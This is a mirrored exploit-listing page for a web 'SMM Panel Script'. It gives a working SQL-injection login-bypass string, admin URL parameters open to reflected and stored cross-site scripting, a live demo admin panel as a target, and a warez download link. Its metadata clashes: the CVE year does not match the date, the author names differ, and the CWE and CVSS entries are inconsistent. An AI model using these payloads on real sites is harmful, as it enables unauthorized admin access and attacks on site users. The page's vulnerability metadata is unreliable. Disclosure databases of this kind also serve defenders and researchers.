Advertisement






SMM Panel Script v2.1 < = 3.0 MUltiple Vulnerabilities

CVE Category Price Severity
CVE-2020-15850 CWE-79 $500 High
Author Risk Exploitation Type Date
InJ3CtOr High Remote 2019-11-09
CPE
cpe:cpe:/a:smm-panel-script:script:v2.1_lt_3.0
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.872 0.997

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110052

Below is a copy:

SMM Panel Script v2.1 <= 3.0 MUltiple Vulnerabilities
/****************************************************************
**
** Exploit Title : SMM Panel Script v2.1 <= 3.0 MUltiple Vulnerabilities
**
** Author : z3r0fy
**
** Venedor Homepage : https://www.web-ofisi.com/
**
** Download (Warez) : https://www.warezm.com/php-scriptleri/ucretsiz-smm-panel-indir-2018-efsane/
**
** Tested On : Parrot Security OS
**
** Demo : http://scalaajans.net/admin/
**
** https://youtu.be/jpzwQwX5bqg
**
\*******************************************************************




WLB 1 : 

AUnthentication Bypass Via Sql

PoC : '=''or'



---------------------------------------------

WLB 2 : 

Reflected Cross Site Scripting


/admin/a-urungaleri-ekle.php?urun_id=[xss pay]
/admin/a-urungaleri-ekle.php?urun_ad=[XSS PAY]

/admin/a-urungaleri-listele.php?urun_id=[xss pay]
/admin/a-urungaleri-listele.php?urun_ad=[XSS PAY]

/admin/a-uruntanitimgaleri-ekle.php?uruntanitim_id=[XSS PAY]



---------------------------------

WLB 3 : 

Stored Cross Site Scripting

/admin/a-api-ayar.php

--------------------------------------------

Twitter.com/z3r0fy

t.me/z3r0fy

------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum